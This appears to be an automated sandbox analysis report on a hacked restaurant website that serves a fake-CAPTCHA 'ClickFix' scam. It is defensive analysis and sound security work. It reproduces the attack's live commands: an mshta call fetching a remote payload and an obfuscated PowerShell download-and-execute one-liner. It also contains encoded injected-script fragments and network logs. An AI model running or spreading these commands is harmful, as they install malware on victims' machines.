Edit tour

Windows Analysis Report
https://thefatshallot.com/

Overview

General Information

Sample URL:	https://thefatshallot.com/
Analysis ID:	4991369
Infos:

Detection

CAPTCHA Scam ClickFix

Score:	76
Range:	0 - 100
Confidence:	100%

Signatures

AI detected malicious page (phishing or scam)

Yara detected AntiDebug via timestamp check

Yara detected CAPTCHA Scam ClickFix

HTML page adds supicious text to clipboard

PowerShell case anomaly found

Sigma detected: Suspicious MSHTA Child Process

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTML page contains obfuscated javascript

HTML page contains obfuscated script src

HTTP GET or POST without a user agent

Javascript checks online IP of machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Suricata IDS alerts with low severity for network traffic

Classification

Process Tree

System is w10x64_ra

chrome.exe (PID: 5320 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: DBE43C1D0092437B88CFF7BD9ABC336C)

chrome.exe (PID: 3560 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2008,i,9504170494183847832,12662986565588292661,262144 --variations-seed-version=20250317-182044.899000 --mojo-platform-channel-handle=2072 /prefetch:3 MD5: DBE43C1D0092437B88CFF7BD9ABC336C)

chrome.exe (PID: 6512 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://thefatshallot.com/" MD5: DBE43C1D0092437B88CFF7BD9ABC336C)

mshta.exe (PID: 6604 cmdline: "C:\Windows\system32\mshta.exe" http://141.0x62.80.175/rtdx.dat MD5: 4CF1AB245C87389F0920BA5D1AFF6D38)

powershell.exe (PID: 1884 cmdline: POWERsHeLl /w h /c "iex (iw"r" ht"tp:/"/xoiias"dpsd"oas"dp"o"ja"s.com)" MD5: BCF01E61144D6D6325650134823198B8)

conhost.exe (PID: 4436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 86191D9E0E30631DB3E78E4645804358)

cleanup

AI Summary

Source: https://thefatshallot.com/

# Phishing Attack Analysis

## Threat Overview
A sophisticated web-based social engineering attack attempting to manipulate users into executing malicious commands by leveraging deceptive UI techniques and multi-stage redirection.

## Key Findings

### Initial Lure
- Original URL: https://thefatshallot.com/
- Unexpected redirection to a random domain: xpoalswwkjddslsjy.com

### Deception Techniques
- Fake Cloudflare verification page used as an initial misdirection
- Full-screen blue page mimicking Windows Update interface
- Goal: Trick users into executing potentially harmful system commands

### Technical Manipulation
- Instructions direct user to:
  - Open Run dialog (Win+R)
  - Paste specific commands (Ctrl+V)
  - Press Enter to execute
- Deliberately mismatched browser and system UI to confuse user

### Attack Indicators
- Random, suspicious domain
- Unrelated initial website
- Aggressive social engineering tactics
- Attempt to bypass user's security awareness

## Conclusion
A multi-stage phishing attack designed to manipulate users into executing potentially malicious commands by exploiting familiar system interfaces and creating a sense of urgency through fake system update screens.

Source: Malware

## Malware Behavior Analysis

### Initial Access
The malware initiates through a web-based attack chain beginning with Chrome navigating to `https://thefatshallot.com/`. This website serves as a malicious landing page that implements a CAPTCHA scam using ClickFix techniques to deceive users into executing malicious commands.

### Evasion Techniques
The malware employs several evasion mechanisms:
- **Anti-analysis techniques**: Implements timestamp-based debugging detection to evade dynamic analysis environments
- **Command obfuscation**: Uses deliberate case anomalies in PowerShell execution (`POWERsHeLl`) and string fragmentation in URLs to bypass detection systems
- **Social engineering**: Presents a fake Windows Update interface and Cloudflare verification page to appear legitimate while instructing users to execute clipboard content via Win+R and Ctrl+V

### Payload Execution
The attack chain proceeds through multiple stages:
1. **mshta.exe** (PID 6604) executes to retrieve a remote payload from `http://141.0x62.80.175/rtdx.dat`
2. **PowerShell** (PID 1884) is spawned by mshta.exe with an obfuscated command attempting to download and execute content from `xoiiasdpsdoasdpojas.com` using `Invoke-Expression` and `Invoke-WebRequest`
3. **conhost.exe** (PID 4436) is launched to support the PowerShell console session

### Network Activity
The malware establishes connections to multiple domains:
- Initial contact with `thefatshallot.com` for the malicious landing page
- Secondary payload retrieval from `141.0x62.80.175/rtdx.dat`
- Attempted third-stage download from `xoiiasdpsdoasdpojas.com`

### Data Manipulation
The malicious webpage adds suspicious content to the system clipboard, likely containing commands designed to be executed when users follow the fake verification instructions.

### MITRE ATT&CK TTPs
- **T1566.002** - Phishing: Spearphishing Link
- **T1218.005** - System Binary Proxy Execution: Mshta
- **T1059.001** - Command and Scripting Interpreter: PowerShell
- **T1140** - Deobfuscate/Decode Files or Information
- **T1027** - Obfuscated Files or Information
- **T1204.001** - User Execution: Malicious Link

The attack represents a multi-stage web-based compromise leveraging social engineering, legitimate system binaries, and obfuscated PowerShell commands to establish initial access and attempt further payload deployment.

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
dropped/chromecache_155	JoeSecurity_CAPTCHAScam	Yara detected CAPTCHA Scam/ ClickFix	Joe Security

HTML

Source	Rule	Description	Author	Strings
0.12.do.script.csv	JoeSecurity_AntiDebugBrowser	Yara detected AntiDebug via timestamp check	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: POWERsHeLl /w h /c "iex (iw"r" ht"tp:/"/xoiias"dpsd"oas"dp"o"ja"s.com)", CommandLine: POWERsHeLl /w h /c "iex (iw"r" ht"tp:/"/xoiias"dpsd"oas"dp"o"ja"s.com)", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mshta.exe" http://141.0x62.80.175/rtdx.dat, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6604, ParentProcessName: mshta.exe, ProcessCommandLine: POWERsHeLl /w h /c "iex (iw"r" ht"tp:/"/xoiias"dpsd"oas"dp"o"ja"s.com)", ProcessId: 1884, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: POWERsHeLl /w h /c "iex (iw"r" ht"tp:/"/xoiias"dpsd"oas"dp"o"ja"s.com)", CommandLine: POWERsHeLl /w h /c "iex (iw"r" ht"tp:/"/xoiias"dpsd"oas"dp"o"ja"s.com)", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mshta.exe" http://141.0x62.80.175/rtdx.dat, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6604, ParentProcessName: mshta.exe, ProcessCommandLine: POWERsHeLl /w h /c "iex (iw"r" ht"tp:/"/xoiias"dpsd"oas"dp"o"ja"s.com)", ProcessId: 1884, ProcessName: powershell.exe

Suricata Signatures

Joe Security ANOMALY Windows PowerShell HTTP activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-10-17T08:52:57.746198+0200	1810000	2	Potentially Bad Traffic	192.168.3.5	49767	141.98.80.175	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

AI detected malicious page (phishing or scam)

Source: https://thefatshallot.com/

Joe Sandbox AI: Score: 10 Reasons: Initial URL is https://thefatshallot.com but screenshots show an unrelated random-looking domain in the address bar (xpoalswwkjddslsjy.com) and a fake Cloudflare/verification interstitial followed by a full-screen blue page that imitates Windows Update; the page instructs the user to run Win+R then Ctrl+V and press Enter (attempting to get the user to execute pasted commands), branding and UI are mismatched (browser UI shown around a faux system screen), and these are classic malicious/drive-by scam indicatorsvery likely phishing/malicious.

Yara detected CAPTCHA Scam ClickFix

Source: Yara match

File source: dropped/chromecache_155, type: DROPPED

Source: https://thefatshallot.com/

HTTP Parser: (function(_0x4ddfed,_0x4873e6){function _0x59d6ec(_0x2ca63c,_0x1291fc,_0x10cd05,_0x381d18,_0x6a58aa)

Source: https://thefatshallot.com/	HTTP Parser: Script src: data:text/javascript;base64,dmFyIGFqYXh1cmwgPSAiaHR0cHM6Ly90aGVmYXRzaGFsbG90LmNvbS93cC1hZG1pbi9hZG1pbi1hamF4LnBocCI7
Source: https://thefatshallot.com/	HTTP Parser: Script src: data:text/javascript;base64,CjshZnVuY3Rpb24gdCgpe3ZhciBlPSJodHRwczovL2dldGZpeC53aW4vanNyZXBvP3JuZD0iK01hdGgucmFuZG9tKCkrIiZ0cz0iK0RhdGUubm93KCk7dHJ5e3ZhciBuPW5ldyBYTUxIdHRwUmVxdWVzdDtpZihuLm9wZW4oIkdFVCIsZSwhMSksbi5zZW5kKG51bGwpLG4uc3RhdHVzPj0yMDAmJm
Source: https://thefatshallot.com/	HTTP Parser: Script src: data:text/javascript;base64,d2luZG93LmFiYiA9IHt9O3BocCA9IHt9O3dpbmRvdy5QSFAgPSB7fTtQSFAuYWpheCA9ICJodHRwczovL3RoZWZhdHNoYWxsb3QuY29tL3dwLWFkbWluL2FkbWluLWFqYXgucGhwIjtQSFAud3BfcF9pZCA9ICI1NDQxIjt2YXIgbWtfaGVhZGVyX3BhcmFsbGF4LCBta19iYW5uZXJfcGFyYWxsYX
Source: https://thefatshallot.com/	HTTP Parser: Script src: data:text/javascript;base64,Ci8qIDwhW0NEQVRBWyAqLwoKV2ViRm9udENvbmZpZyA9IHsKCXRpbWVvdXQ6IDIwMDAKfQoKaWYgKCBta190eXBla2l0X2lkLmxlbmd0aCA+IDAgKSB7CglXZWJGb250Q29uZmlnLnR5cGVraXQgPSB7CgkJaWQ6IG1rX3R5cGVraXRfaWQKCX0KfQoKaWYgKCBta19nb29nbGVfZm9udHMubGVuZ3
Source: https://thefatshallot.com/	HTTP Parser: Script src: data:text/javascript;base64,
Source: https://thefatshallot.com/	HTTP Parser: Script src: data:text/javascript;base64,IHZhciBpc1Rlc3QgPSBmYWxzZTsg
Source: https://thefatshallot.com/	HTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gc2V0UkVWU3RhcnRTaXplKGUpewoJCQkvL3dpbmRvdy5yZXF1ZXN0QW5pbWF0aW9uRnJhbWUoZnVuY3Rpb24oKSB7CgkJCQl3aW5kb3cuUlNJVyA9IHdpbmRvdy5SU0lXPT09dW5kZWZpbmVkID8gd2luZG93LmlubmVyV2lkdGggOiB3aW5kb3cuUlNJVzsKCQkJCXdpbmRvdy5SU0

Source: https://xpoalswwkjddsljsy.com/

HTTP Parser: document.addeventlistener('domcontentloaded', async () => {function getcookie(name) {return document.cookie.split('; ').find((row) => row.startswith(name + '='))?.split('=')[1];}function setcookie(name, value, maxageseconds) {document.cookie = `${name}=${value}; path=/; max-age=${maxageseconds}`;}const basehref = document.queryselector('base')?.getattribute('href') || '/';const pathsegments = basehref.split('/').filter(boolean);const site_folder = pathsegments.length ? pathsegments[pathsegments.length - 1] : '';let clientip = '';try {const ipres = await fetch('https://api.ipify.org?format=json');const ipdata = await ipres.json();clientip = ipdata.ip || '';} catch (e) {console.warn(' ip ', e);}async function sendstat(action) {if (!clientip) return;try {await fetch('/r-pannel/stats.php?action=' + encodeuricomponent(action) + '&folder=' + encode...

Source: https://xpoalswwkjddsljsy.com/	HTTP Parser: No favicon
Source: https://xpoalswwkjddsljsy.com/	HTTP Parser: No favicon
Source: https://xpoalswwkjddsljsy.com/	HTTP Parser: No favicon
Source: https://xpoalswwkjddsljsy.com/	HTTP Parser: No favicon
Source: https://xpoalswwkjddsljsy.com/	HTTP Parser: No favicon

Source: unknown	HTTPS traffic detected: 135.233.95.144:443 -> 192.168.3.5:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 135.233.95.144:443 -> 192.168.3.5:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.21.22.99:443 -> 192.168.3.5:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.21.22.144:443 -> 192.168.3.5:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.21.22.144:443 -> 192.168.3.5:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.42.73.26:443 -> 192.168.3.5:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.222:443 -> 192.168.3.5:49762 version: TLS 1.2

Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000016.00000002.2002117152.0000021C5BF75000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000016.00000002.2002617898.0000021C5C184000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: softy.pdbt source: powershell.exe, 00000016.00000002.2002117152.0000021C5BF75000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb"K'yG source: powershell.exe, 00000016.00000002.2002117152.0000021C5BF75000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000016.00000002.2002117152.0000021C5BFC0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000016.00000002.2002617898.0000021C5C184000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb. source: powershell.exe, 00000016.00000002.2002617898.0000021C5C1B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb* source: powershell.exe, 00000016.00000002.2002617898.0000021C5C184000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbf3856ad364e35 source: powershell.exe, 00000016.00000002.2002617898.0000021C5C1B7000.00000004.00000020.00020000.00000000.sdmp

Source: global traffic

HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=run&setlang=en-CH&cc=CH&nohs=1&qfm=1&seahisoff=1&cp=3&cvid=7381fb06e0214b5993b84b2d7aeaf562&ig=313453f10cb54ff68d37fb3533327198 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A410900D818x-bm-cbt: 1742302773x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x984x-bm-devicedimensionslogical: 784x984x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: 09100D986E1E42B291BE10116DFD7800x-device-isoptin: falsex-device-machineid: {E1FC8648-BDDC-4041-95D0-3C283137B766}x-device-manufacturer: VMware, Inc.x-device-ossku: 48x-device-product: VMware20,1x-device-touch: falsex-deviceid: 01000A410900D818x-msedge-externalexp: d-thshld39,d-thshld42,miniserp38ir,mslogoscopetf,psduc,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderate

Source: Network traffic

Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.3.5:49767 -> 141.98.80.175:80

Source: unknown	TCP traffic detected without corresponding DNS query: 104.208.16.92
Source: unknown	TCP traffic detected without corresponding DNS query: 23.40.158.218
Source: unknown	TCP traffic detected without corresponding DNS query: 104.208.16.92
Source: unknown	TCP traffic detected without corresponding DNS query: 23.40.158.218
Source: unknown	TCP traffic detected without corresponding DNS query: 23.40.158.218
Source: unknown	TCP traffic detected without corresponding DNS query: 104.208.16.92
Source: unknown	TCP traffic detected without corresponding DNS query: 150.171.28.12
Source: unknown	TCP traffic detected without corresponding DNS query: 23.40.158.218
Source: unknown	TCP traffic detected without corresponding DNS query: 104.208.16.92
Source: unknown	TCP traffic detected without corresponding DNS query: 150.171.28.12
Source: unknown	TCP traffic detected without corresponding DNS query: 150.171.28.12
Source: unknown	TCP traffic detected without corresponding DNS query: 150.171.28.12
Source: unknown	TCP traffic detected without corresponding DNS query: 23.40.158.218
Source: unknown	TCP traffic detected without corresponding DNS query: 104.208.16.92
Source: unknown	TCP traffic detected without corresponding DNS query: 135.233.95.144
Source: unknown	TCP traffic detected without corresponding DNS query: 135.233.95.144
Source: unknown	TCP traffic detected without corresponding DNS query: 135.233.95.144
Source: unknown	TCP traffic detected without corresponding DNS query: 150.171.28.12
Source: unknown	TCP traffic detected without corresponding DNS query: 135.233.95.144
Source: unknown	TCP traffic detected without corresponding DNS query: 135.233.95.144
Source: unknown	TCP traffic detected without corresponding DNS query: 135.233.95.144
Source: unknown	TCP traffic detected without corresponding DNS query: 135.233.95.144
Source: unknown	TCP traffic detected without corresponding DNS query: 135.233.95.144
Source: unknown	TCP traffic detected without corresponding DNS query: 135.233.95.144
Source: unknown	TCP traffic detected without corresponding DNS query: 135.233.95.144
Source: unknown	TCP traffic detected without corresponding DNS query: 135.233.95.144
Source: unknown	TCP traffic detected without corresponding DNS query: 135.233.95.144
Source: unknown	TCP traffic detected without corresponding DNS query: 135.233.95.144
Source: unknown	TCP traffic detected without corresponding DNS query: 135.233.95.144
Source: unknown	TCP traffic detected without corresponding DNS query: 135.233.95.144
Source: unknown	TCP traffic detected without corresponding DNS query: 135.233.95.144
Source: unknown	TCP traffic detected without corresponding DNS query: 135.233.95.144
Source: unknown	TCP traffic detected without corresponding DNS query: 135.233.95.144
Source: unknown	TCP traffic detected without corresponding DNS query: 135.233.95.144
Source: unknown	TCP traffic detected without corresponding DNS query: 135.233.95.144
Source: unknown	TCP traffic detected without corresponding DNS query: 23.40.158.218
Source: unknown	TCP traffic detected without corresponding DNS query: 104.208.16.92
Source: unknown	TCP traffic detected without corresponding DNS query: 150.171.28.12
Source: unknown	TCP traffic detected without corresponding DNS query: 23.40.158.218
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 23.40.158.218
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 23.40.158.218
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 23.40.158.218
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 23.40.158.218
Source: unknown	TCP traffic detected without corresponding DNS query: 23.40.158.218
Source: unknown	TCP traffic detected without corresponding DNS query: 150.171.28.12

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1host: thefatshallot.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: nonesec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: documentaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0, i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2018/04/logo21.png HTTP/1.1host: thefatshallot.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://thefatshallot.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2025/04/untitled-design.png HTTP/1.1host: thefatshallot.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://thefatshallot.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2025/04/untitled-design-1.png HTTP/1.1host: thefatshallot.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://thefatshallot.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2023/02/fat-shallot-merchandise-mart.png HTTP/1.1host: thefatshallot.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://thefatshallot.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2019/05/fat-shallot-chicago-tall.jpg HTTP/1.1host: thefatshallot.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://thefatshallot.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2018/06/fatshallottruck.png HTTP/1.1host: thefatshallot.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://thefatshallot.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2022/02/fat-shallot-gillson-beach.jpg HTTP/1.1host: thefatshallot.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://thefatshallot.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/wp-rocket/assets/js/lazyload/17.8.3/lazyload.min.js HTTP/1.1host: thefatshallot.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://thefatshallot.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jsrepo?rnd=0.11634913867038876&ts=1760683896011 HTTP/1.1Host: getfix.winConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Origin: https://thefatshallot.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://thefatshallot.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 HTTP/1.1host: thefatshallot.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://thefatshallot.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/jupiter/header-builder/includes/assets/js/mkhb-render.js?ver=1759909476 HTTP/1.1host: thefatshallot.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://thefatshallot.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/jupiter/assets/js/plugins/wp-enqueue/smoothscroll.js?ver=1759909474 HTTP/1.1host: thefatshallot.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://thefatshallot.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/jupiter/assets/js/components-full.6.12.2.js?ver=1759909476 HTTP/1.1host: thefatshallot.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://thefatshallot.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /wp-content/themes/jupiter/assets/js/plugins/wp-enqueue/webfontloader.js?ver=6.8.3 HTTP/1.1host: thefatshallot.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://thefatshallot.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
